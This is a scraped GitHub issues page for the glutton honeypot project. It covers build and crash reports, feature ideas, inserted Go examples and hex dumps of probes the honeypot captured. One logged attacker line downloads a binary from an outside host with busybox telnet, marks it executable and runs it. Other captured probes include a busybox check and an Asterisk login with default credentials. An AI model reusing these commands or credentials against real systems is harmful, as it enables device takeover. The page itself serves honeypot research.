mushorg / glutton
Generic Low Interaction Honeypot
License: MIT License
This looks interesting: https://github.com/dutchcoders/sshproxy
Currently the Travis tests do not check if the docker image builds successfully. There are two ways that I can see this going. The first is to build the docker image and then run the unit test on it too and the other is to just build the docker image.
Has anyone seen events that look like those described here? https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/
Investigate if we get enough information from /proc/net/nf_conntrack or /proc/net/ip_conntrack
The container should be as minimal as possible. I guess either Alpine or even smaller.
I did the previous steps in the new readme, but glide install is failing for me. I tried changing the VM but got the same result.
root@beta2:~/gowork/src/github.com/mushorg/glutton# glide install
[INFO] Downloading dependencies. Please wait...
[INFO] --> Found desired version locally github.com/1lann/go-sip 68e86c65407ef8cf672ae38526e7f3d29944b94f!
[INFO] --> Found desired version locally github.com/coreos/go-iptables 5463fbac3bcc6b990663941c2e12660d19f6b36d!
[INFO] --> Found desired version locally github.com/docker/distribution fb0bebc4b64e3881cc52a2478d749845ed76d2a8!
[INFO] --> Found desired version locally github.com/docker/engine-api 4290f40c056686fcaa5c9caf02eac1dde9315adf!
[INFO] --> Found desired version locally github.com/docker/go-connections 9670439d95da2651d9dfc7acc5d2ed92d3f25ee6!
[INFO] --> Found desired version locally github.com/docker/go-units 0dadbb0345b35ec7ef35e228dabb8de89a65bf52!
[INFO] --> Found desired version locally github.com/google/gopacket b83f94714c36e30ce851be1d5a0a5226f9f1bca4!
[INFO] --> Found desired version locally github.com/kung-foo/freki b6a126f46f7b0ce15cdc1d50df8d3626377ff7a7!
[INFO] --> Found desired version locally github.com/Microsoft/go-winio fff283ad5116362ca252298cfc9b95828956d85d!
[INFO] --> Found desired version locally github.com/opencontainers/go-digest aa2ec055abd10d26d539eb630a92241b781ce4bc!
[INFO] --> Found desired version locally github.com/pkg/errors 645ef00459ed84a119197bfb8d8205042c6df63d!
[INFO] --> Found desired version locally github.com/satori/go.uuid b061729afc07e77a8aa4fad0a2fd840958f1942a!
[INFO] --> Found desired version locally github.com/sirupsen/logrus d26492970760ca5d33129d2d799e34be5c4782eb!
[INFO] --> Found desired version locally github.com/Sirupsen/logrus d26492970760ca5d33129d2d799e34be5c4782eb!
[INFO] --> Found desired version locally gopkg.in/yaml.v2 a5b47d31c556af34a302ce5d659e6fea44d90de0!
[INFO] --> Fetching golang.org/x/net
[INFO] --> Fetching golang.org/x/sys
[WARN] Unable to checkout golang.org/x/sys
[ERROR] Update failed for golang.org/x/sys: Cannot detect VCS
[WARN] Unable to checkout golang.org/x/net
[ERROR] Update failed for golang.org/x/net: Cannot detect VCS
[ERROR] Failed to install: Cannot detect VCS
Cannot detect VCS
INFO[20219] [telnet ] recv: "/bin/busybox satori\x00\r\n"
INFO[20220] [telnet ] send: "> "
Seeing lots of those and no further stage. Ideas?
There is no ports.yml source file.
cp $GOPATH/src/github.com/mushorg/glutton/config/ports.yml /etc/glutton
root@debian8template:/# cp $GOPATH/src/github.com/mushorg/glutton/config/ports.yml /etc/glutton
cp: cannot stat ‘/opt/go/src/github.com/mushorg/glutton/config/ports.yml’: No such file or directory
I ran glutton and tried to connect from localhost via telnet; it crashed showing the following error.
My VM is running Debian GNU/Linux 8.
root@debian8template:~# go run /opt/go/src/github.com/mushorg/glutton/app/server.go -log /tmp/glutton.log
  _____ _       _   _
 / ____| |     | | | |
| |  __| |_   _| |_| |_ ___  _ __
| | |_ | | | | | __| __/ _ \| '_ \
| |__| | | |_| | |_| || (_) | | | |
 \_____|_|\__,_|\__|\__\___/|_| |_|
INFO[0000] [glutton ] Loading rules from: /etc/glutton/rules.yaml
INFO[0000] [glutton ] Rules: [Rule: tcp dst port 5001 Rule: tcp dst port 23 or port 2323 or port 23231 Rule: tcp]
INFO[0000] [freki ] starting freki on [x.x.x.55]
INFO[0000] [freki ] starting proxy.tcp on 6000
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x404c50]
goroutine 27 [running]:
panic(0x753ac0, 0xc4200120b0)
/usr/local/go/src/runtime/panic.go:500 +0x1a1
main.main.func3.1(0xc4212e4c80, 0xc421305580, 0xc42131ce80, 0xc42133ef40, 0xbb3440, 0xc420024000)
/opt/go/src/github.com/mushorg/glutton/app/server.go:161 +0x200
created by main.main.func3
/opt/go/src/github.com/mushorg/glutton/app/server.go:194 +0x14c
exit status 2
I have this error many times.
2017/11/28 18:31:16 DEBUG [freki ] new TCP connection x.x.x.x:x->22
2017/11/28 18:31:16 DEBUG [contable] registering x.x.x.x:x->22
2017/11/28 18:31:16 ERROR [user.tcp] panic: runtime error: invalid memory address or nil pointer dereference
2017/11/28 18:31:16 ERROR [user.tcp] stacktrace:
goroutine 21245 [running]:
runtime/debug.Stack(0xc42000e3f0, 0xa89c2a, 0x15)
/usr/local/go/src/runtime/debug/stack.go:24 +0x79
github.com/mushorg/glutton/vendor/github.com/kung-foo/freki.(*UserConnServer).Start.func1.1(0xfc1960, 0xc42000e5f8)
/x/x/x/x/src/github.com/mushorg/glutton/vendor/github.com/kung-foo/freki/userconnhandler_tcp.go:66 +0xda
panic(0x9c4ee0, 0xfa6f90)
/usr/local/go/src/runtime/panic.go:489 +0x2cf
github.com/mushorg/glutton.(*sshProxy).handle(0x0, 0xfbd5c0, 0xc422b9bc80, 0xfc1960, 0xc42000e5f8, 0x0, 0x0)
/x/x/x/x/src/github.com/mushorg/glutton/proxy_ssh.go:131 +0xb2
github.com/mushorg/glutton.(*Glutton).mapProtocolHandlers.func9(0xfbd5c0, 0xc422b9bc80, 0xfc1960, 0xc42000e5f8, 0xc42141e808, 0x0)
/x/x/x/x/src/github.com/mushorg/glutton/protocols.go:51 +0x56
github.com/mushorg/glutton.(*Glutton).registerHandlers.func1(0xfc1960, 0xc42000e5f8, 0xc422b9b950, 0xc42000e5f8, 0x0)
/x/x/x/x/src/github.com/mushorg/glutton/glutton.go:214 +0x3d3
github.com/mushorg/glutton/vendor/github.com/kung-foo/freki.(*UserConnServer).Start.func1(0xfc1960, 0xc42000e5f8, 0xc421430300, 0xc422b9b950, 0xc4214302e0)
/x/x/x/x/src/github.com/mushorg/glutton/vendor/github.com/kung-foo/freki/userconnhandler_tcp.go:70 +0x7c
created by github.com/mushorg/glutton/vendor/github.com/kung-foo/freki.(*UserConnServer).Start
/x/x/x/x/src/github.com/mushorg/glutton/vendor/github.com/kung-foo/freki/userconnhandler_tcp.go:74 +0x32c
If Glutton is started as root, we should drop privileges to the nobody user.
How to redirect all traffic to the port we are listening on.
How to set the sshd port to a different port.
How to exempt the sshd port from the redirect so we can connect to the machine.
Create a PCAP, pass it to TShark (https://www.wireshark.org/docs/man-pages/tshark.html) for dissection and use the protocol info to pick the right handler.
We want to store the traffic/payload of the requests. We should consider pcap.
http://www.devdungeon.com/content/packet-capture-injection-and-analysis-gopacket
Similar to this: https://github.com/dutchcoders/troje
I'd like to have a handler that I can assign to ports:
ports:
  21:
    default
Default handler should accept the connection and read the package payload. This might trigger additional packages.
Right now the package is dropped if there is no proxy configured for that port. I'd like to see at least a message with the remote IP address and the target port. Are we logging those connection attempts? If not, we should also have a log entry with the same information.
Connection timeout values are hard coded in code:
conn.SetDeadline(time.Now().Add(45 * time.Second))
Expose it as a flag or configuration file attribute so that users can customize it.
Cli provides a very easy way to register, order and categorize commands and the optional flags required to run a command line application. The source of input can also be JSON or TOML. We can register init and exit code for our application. It provides a context that travels to all handler functions of the application, so flags can be accessed and set at any level of the application with the help of the context. The context can be used to track and shut down goroutines.
I am trying to compile the code. It gives no error on the build command, but when I run the server file it gives the following error:
[glutton ] open rules/rules.yaml: no such file or directory
When you try to start Glutton right now with an interface parameter it throws the following error:
  _____ _       _   _
 / ____| |     | | | |
| |  __| |_   _| |_| |_ ___  _ __
| | |_ | | | | | __| __/ _ \| '_ \
| |__| | | |_| | |_| || (_) | | | |
 \_____|_|\__,_|\__|\__\___/|_| |_|
panic: interface conversion: interface is string, not bool
goroutine 1 [running]:
panic(0x980a40, 0xc42138cc00)
/usr/local/go/src/runtime/panic.go:500 +0x1a1
github.com/mushorg/glutton.New(0xc421375c20, 0x0, 0x0, 0x0)
/go/src/github.com/mushorg/glutton/glutton.go:42 +0x2b5
main.main()
/go/src/github.com/mushorg/glutton/app/server.go:56 +0x19b
From what I have been able to tell this might have started in PR #91.
@gento I see a bunch of those lately:
fgrep XDVR /mnt/mtd/dep2.sh\x00
After that there is no additional step. I assume they expect a specific response payload.
Glutton eventually fails with:
[user.tcp] accept tcp [::]:5000: accept4: too many open files
Track the number of open connections, how many we drop, how many the client drops, etc.
Use https://golang.org/pkg/net/#TCPListener.SetDeadline to drop connections that time out. Here is a related SO discussion: https://stackoverflow.com/questions/12741386/how-to-know-tcp-connection-is-closed-in-golang-net-package
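The two requests on this page, a configurable deadline instead of the hard-coded 45-second SetDeadline and counters for open, timed-out and client-closed connections, fit in one accept loop. This is an added example, not glutton's or freki's code: the read deadline and a concurrency cap are flags, the cap keeps Accept from running into "too many open files", and each connection's outcome is counted. Field, flag and function names are assumed.

```go
package main

import (
	"errors"
	"flag"
	"io"
	"log"
	"net"
	"sync/atomic"
	"time"
)

// Server: accept loop with the deadline and concurrency cap as settings (assumed names, not glutton's config).
type Server struct {
	Open, TimedOut, ClientClosed int64 // connection outcomes, updated atomically (kept first for 64-bit alignment)
	ReadTimeout                  time.Duration // replaces the hard-coded 45s deadline
	MaxConns                     int           // upper bound on sockets held open, so Accept never hits EMFILE
	slots                        chan struct{}
}

// Serve accepts until ln fails; with MaxConns sockets open it waits for a free slot instead of opening more.
func (s *Server) Serve(ln net.Listener, handle func(net.Conn, []byte)) error {
	s.slots = make(chan struct{}, s.MaxConns)
	for {
		conn, err := ln.Accept()
		if err != nil {
			return err
		}
		s.slots <- struct{}{} // blocks while every slot is taken; the kernel backlog queues new clients
		go s.handleConn(conn, handle)
	}
}

func (s *Server) handleConn(conn net.Conn, handle func(net.Conn, []byte)) {
	atomic.AddInt64(&s.Open, 1)
	defer func() { conn.Close(); atomic.AddInt64(&s.Open, -1); <-s.slots }()
	conn.SetDeadline(time.Now().Add(s.ReadTimeout))
	buf := make([]byte, 4096)
	n, err := conn.Read(buf)
	var ne net.Error
	switch {
	case errors.As(err, &ne) && ne.Timeout(): // silent client: dropped by us
		atomic.AddInt64(&s.TimedOut, 1)
	case errors.Is(err, io.EOF): // client hung up before sending anything
		atomic.AddInt64(&s.ClientClosed, 1)
	case err == nil:
		handle(conn, buf[:n]) // first payload goes to the protocol handler
	}
}

func main() {
	timeout := flag.Duration("timeout", 45*time.Second, "per-connection read deadline")
	maxConns := flag.Int("max-conns", 1000, "maximum concurrent connections")
	flag.Parse()
	ln, err := net.Listen("tcp", "127.0.0.1:5000")
	if err != nil {
		log.Fatal(err)
	}
	s := &Server{ReadTimeout: *timeout, MaxConns: *maxConns}
	log.Fatal(s.Serve(ln, func(c net.Conn, p []byte) { log.Printf("%s: %q", c.RemoteAddr(), p) }))
}
```

Note that SetDeadline on the accepted connection is what bounds a silent client; a deadline on the listener only bounds Accept itself.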
Readme needs an update after we changed the core to Freki.
Hi all,
Has anyone encountered this compilation issue with the 'make build' command for the latest commits?
I am trying to compile Glutton on Ubuntu 16.04.
test@test:/opt/go/src/github.com/mushorg/glutton$ sudo make clean
rm -rf bin/
test@test:/opt/go/src/github.com/mushorg/glutton$ sudo make build
go build -o $GOPATH/bin/server app/server.go
// # command-line-arguments
app/server.go:75: too many arguments in call to glutton.New
app/server.go:77: gtn.Start undefined (type *glutton.Glutton has no field or method Start)
Makefile:6: recipe for target 'build' failed
make: *** [build] Error 2
test@test:/opt/go/src/github.com/mushorg/glutton$ go version
go version go1.7.1 linux/amd64
test@test:/opt/go/src/github.com/mushorg/glutton$
Any idea how to solve this? Thanks!
DEBU[0648] [freki ] new connection 47.X.X.X:56695->9000
DEBU[0648] [contable] registering 47.X.X.X:56695->9000
DEBU[0648] [glutton ] new connection: 47.X.X.X:56695 -> 9000
00000000 52 45 4d 4f 54 45 20 48 49 5f 53 52 44 4b 5f 44 |REMOTE HI_SRDK_D|
00000010 45 56 5f 47 65 74 48 64 64 49 6e 66 6f 20 4d 43 |EV_GetHddInfo MC|
00000020 54 50 2f 31 2e 30 0d 0a 43 53 65 71 3a 31 37 33 |TP/1.0..CSeq:173|
00000030 0d 0a 41 63 63 65 70 74 3a 74 65 78 74 2f 48 44 |..Accept:text/HD|
00000040 50 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a |P..Content-Type:|
00000050 74 65 78 74 2f 48 44 50 0d 0a 46 75 6e 63 2d 56 |text/HDP..Func-V|
00000060 65 72 73 69 6f 6e 3a 30 78 31 30 0d 0a 43 6f 6e |ersion:0x10..Con|
00000070 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 31 35 0d 0a |tent-Length:15..|
00000080 0d 0a 53 65 67 6d 65 6e 74 2d 4e 75 6d 3a 30 0d |..Segment-Num:0.|
00000090 0a |.|
See DICOM: https://en.wikipedia.org/wiki/DICOM
Sample request:
00000000 01 00 00 00 01 00 00 01 00 00 41 4e 59 2d 53 43 |..........ANY-SC|
00000010 50 20 20 20 20 20 20 20 20 20 46 49 4e 44 53 43 |P         FINDSC|
00000020 55 20 20 20 20 20 20 20 20 20 00 00 00 00 00 00 |U         ......|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 00 00 00 00 00 00 00 00 00 00 10 00 00 15 31 2e |..............1.|
00000050 32 2e 38 34 30 2e 31 30 30 30 38 2e 33 2e 31 2e |2.840.10008.3.1.|
00000060 31 2e 31 20 00 00 61 01 00 ff 00 30 00 00 16 31 |1.1 ..a....0...1|
00000070 2e 32 2e 38 34 30 2e 31 30 30 30 38 2e 35 2e 31 |.2.840.10008.5.1|
00000080 2e 34 2e 33 31 40 00 00 13 31 2e 32 2e 38 34 30 |.4.31@...1.2.840|
00000090 2e 31 30 30 30 38 2e 31 2e 32 2e 31 40 00 00 13 |.10008.1.2.1@...|
000000a0 31 2e 32 2e 38 34 30 2e 31 30 30 30 38 2e 31 2e |1.2.840.10008.1.|
000000b0 32 2e 32 40 00 00 11 31 2e 32 2e 38 34 30 2e 31 |2.2@...1.2.840.1|
000000c0 30 30 30 38 2e 31 2e 32 50 00 00 3a 51 00 00 04 |0008.1.2P..:Q...|
000000d0 00 00 40 00 52 00 00 1b 31 2e 32 2e 32 37 36 2e |..@.R...1.2.276.|
000000e0 30 2e 37 32 33 30 30 31 30 2e 33 2e 30 2e 33 2e |0.7230010.3.0.3.|
000000f0 36 2e 30 55 00 00 0f 4f 46 46 49 53 5f 44 43 4d |6.0U...OFFIS_DCM|
00000100 54 4b 5f 33 36 30 |TK_360|
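The request above is a DICOM A-ASSOCIATE-RQ (PDU type 0x01): a fixed header carrying the called and calling AE titles, followed by length-prefixed items, one of which (type 0x20) nests the abstract syntax the client wants to use. As an added example, not glutton code, here is a parser that reads it far enough to log who the client claims to be and which service it asks for, while rejecting truncated PDUs and item lengths that overrun their container. Offsets and item types follow DICOM PS3.8; SampleRQ is a constructed PDU built from the values in the dump, not the raw capture.

```go
package main

import (
	"encoding/binary"
	"errors"
	"strings"
)
// AssociateRQ: the A-ASSOCIATE-RQ fields (DICOM PS3.8 section 9.3.2) worth logging per connection.
type AssociateRQ struct {
	CalledAE, CallingAE string   // 16-byte, space-padded AE titles
	AbstractSyntaxes    []string // one per proposed presentation context (sub-item 0x30)
}
// parseItems splits a TLV sequence (type, reserved, uint16 BE length, value) starting at skip, grouped by type.
func parseItems(b []byte, skip int) (map[byte][][]byte, error) {
	out := map[byte][][]byte{}
	for off := skip; off < len(b); {
		if off+4 > len(b) {
			return nil, errors.New("short item header")
		}
		end := off + 4 + int(binary.BigEndian.Uint16(b[off+2:]))
		if end > len(b) {
			return nil, errors.New("item length exceeds container")
		}
		out[b[off]] = append(out[b[off]], b[off+4:end])
		off = end
	}
	return out, nil
}
// ParseAssociateRQ checks the PDU type and declared length before touching any field.
func ParseAssociateRQ(b []byte) (*AssociateRQ, error) {
	if len(b) < 74 || b[0] != 0x01 {
		return nil, errors.New("not an A-ASSOCIATE-RQ PDU")
	}
	end := 6 + int(binary.BigEndian.Uint32(b[2:6])) // length field excludes the 6-byte header
	if end > len(b) {
		return nil, errors.New("truncated PDU")
	}
	top, err := parseItems(b[74:end], 0)
	if err != nil {
		return nil, err
	}
	rq := &AssociateRQ{CalledAE: strings.TrimRight(string(b[10:26]), " "), CallingAE: strings.TrimRight(string(b[26:42]), " ")}
	for _, pc := range top[0x20] { // presentation context: id(1)+reserved(3), then sub-items
		sub, err := parseItems(pc, 4)
		if err != nil {
			return nil, err
		}
		for _, as := range sub[0x30] {
			rq.AbstractSyntaxes = append(rq.AbstractSyntaxes, string(as))
		}
	}
	return rq, nil
}
// SampleRQ is a constructed PDU with the values seen in the dump above (not the raw capture).
func SampleRQ() []byte {
	item := func(t byte, v string) string { return string([]byte{t, 0, 0, byte(len(v))}) + v }
	body := "\x00\x01\x00\x00ANY-SCP" + strings.Repeat(" ", 9) + "FINDSCU" + strings.Repeat(" ", 9) + strings.Repeat("\x00", 32) +
		item(0x10, "1.2.840.10008.3.1.1.1") + item(0x20, "\x01\x00\xff\x00"+item(0x30, "1.2.840.10008.5.1.4.31"))
	return append([]byte{1, 0, 0, 0, byte(len(body) >> 8), byte(len(body))}, body...)
}
```

The abstract syntax 1.2.840.10008.5.1.4.31 in the capture is the Modality Worklist query, so a handler keyed on that field can tell a worklist probe from a storage attempt before answering.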
I tried to run server.go from /app/server.go but I am getting an error in the freki package.
I had installed freki using the command:
go get github.com/kung-foo/freki
Also tried:
go install golang.org/x/net/context
But I get the same error while running:
root@debian8template:/opt/go/src/github.com# go run /opt/go/src/github.com/mushorg/glutton/app/server.go
kung-foo/freki/freki.go:4:2: cannot find package "context" in any of:
/usr/lib/go/src/pkg/context (from $GOROOT)
/opt/go/src/context (from $GOPATH)
Am I doing something wrong here?
Deployed the latest glutton on a Digital Ocean droplet (no docker) and ran a basic nmap scan (all TCP ports). I would expect to see all ports reported as open, but some ports did not respond and many "use of closed network connection" errors were logged:
[email protected]:~$ nmap g.g.g.g
Starting Nmap 6.40 ( http://nmap.org ) at 2017-11-17 04:46 GMT
Nmap scan report for g.g.g.g
Host is up (0.18s latency).
PORT STATE SERVICE
1/tcp open tcpmux
3/tcp open compressnet
4/tcp open unknown
6/tcp open unknown
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
20/tcp open ftp-data
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
24/tcp open priv-mail
25/tcp open smtp
26/tcp open rsftp
30/tcp open unknown
...
Logs:
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:40613: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:50191: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:56103: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:56748: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:35219: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:37463: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:50858: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:41272: use of closed network connection
read /bin/busybox telnet x.x.x.x 6745 > test; /bin/busybox chmod 777 test ; ./test
Add capability to add a delay to responses. Delay should be random in range. Global or per port and transport layer.
Add support for mitm https connections, like: https://github.com/malfunkt/hyperfox
DEBU[1386] [freki ] new connection 188.X.X.X:47651->5005
DEBU[1386] [contable] registering 188.X.X.X:47651->5005
DEBU[1386] [glutton ] new connection: 188.X.X.X:47651 -> 5005
00000000 4a 44 57 50 2d 48 61 6e 64 73 68 61 6b 65 |JDWP-Handshake|
Add support for a config file to whitelist and blacklist ports to handle/listen on.
It's going to be interesting if we can drop the connection in Glutton in a way that it looks like nothing is listening on that port.
The purpose is to let you listen only on certain ports, to make Glutton less obvious.
This is rather confusing and conflicting with the default value of the parameter: https://github.com/mushorg/glutton/blob/master/logger.go#L11
This seems handy: https://github.com/hillu/go-yara
This means no more listener but passing handlers to freki.
I'm running Glutton directly on my server. Every 1-2 days the server becomes unreachable. I assume Glutton crashed and didn't clean up the iptables rules, locking me out from the machine. I have to reboot the box in order to access it again. I tail stderr to a file to see if there is any output, so far without luck. I assume we never execute https://github.com/kung-foo/freki/blob/master/freki.go#L245 on a panic.
On port 3260
00000000 03 81 00 00 00 00 00 5f 40 00 01 37 00 00 00 00 |......._@..7....|
00000010 00 00 00 01 00 01 00 00 00 00 00 01 00 00 00 01 |................|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 49 6e 69 74 69 61 74 6f 72 4e 61 6d 65 3d 69 71 |InitiatorName=iq|
00000040 6e 2e 31 39 39 31 2d 30 35 2e 63 6f 6d 2e 6d 69 |n.1991-05.com.mi|
00000050 63 72 6f 73 6f 66 74 3a 6e 6d 61 70 5f 69 73 63 |crosoft:nmap_isc|
00000060 73 69 5f 70 72 6f 62 65 00 53 65 73 73 69 6f 6e |si_probe.Session|
00000070 54 79 70 65 3d 44 69 73 63 6f 76 65 72 79 00 41 |Type=Discovery.A|
00000080 75 74 68 4d 65 74 68 6f 64 3d 4e 6f 6e 65 00 00 |uthMethod=None..|
I'm still having this issue:
[user.tcp] accept tcp [::]:5000: accept4: too many open files
DEBU[0177] [freki ] new connection x.130:14898->5269
DEBU[0177] [contable] registering x.130:14898->5269
INFO[0178] [log.tcp ]
00000000 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 |<?xml version='1|
00000010 2e 30 27 3f 3e 3c 73 74 72 65 61 6d 3a 73 74 72 |.0'?><stream:str|
00000020 65 61 6d 20 78 6d 6c 6e 73 3a 73 74 72 65 61 6d |eam xmlns:stream|
00000030 3d 27 68 74 74 70 3a 2f 2f 65 74 68 65 72 78 2e |='http://etherx.|
00000040 6a 61 62 62 65 72 2e 6f 72 67 2f 73 74 72 65 61 |jabber.org/strea|
00000050 6d 73 27 20 78 6d 6c 6e 73 3d 27 6a 61 62 62 65 |ms' xmlns='jabbe|
00000060 72 3a 63 6c 69 65 6e 74 27 20 78 6d 6c 3a 6c 61 |r:client' xml:la|
00000070 6e 67 3d 27 65 6e 2d 55 53 27 20 74 6f 3d 27 2e |ng='en-US' to='.|
00000080 27 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 3e |' version='1.0'>|
https://github.com/mushorg/glutton/blob/master/logger.go#L15-L16 spot the issue. Maybe add some testing for the logger and log file paths?
See here: http://the-asterisk-book.com/1.6/asterisk-manager-api.html
Example
DEBU[3273] [freki ] new connection xxx:38244->5038
DEBU[3273] [contable] registering xxx:38244->5038
INFO[3281] [log.tcp ] xxx
00000000 41 63 74 69 6f 6e 3a 20 4c 6f 67 69 6e 0d 0a 55 |Action: Login..U|
00000010 73 65 72 6e 61 6d 65 3a 20 61 64 6d 69 6e 0d 0a |sername: admin..|
00000020 53 65 63 72 65 74 3a 20 6d 61 6e 61 67 65 72 0d |Secret: manager.|
00000030 0a 45 76 65 6e 74 73 3a 20 6f 66 66 0d 0a 0d 0a |.Events: off....|
Honeytrap has a couple of service banners we could use to get to the next stages for connections requiring a banner.
Can be found here: https://github.com/armedpot/honeytrap/tree/master/etc/responses
Add a handler able to proxy a request to a local or remote service. For example redirecting ssh requests to a Kippo instance.
A yaml configuration file that has a PORT->IP:PORT mapping. When you get a connection, get the data, create a TCP client, send it to the proxy target, fetch the response and send it back to the attacker.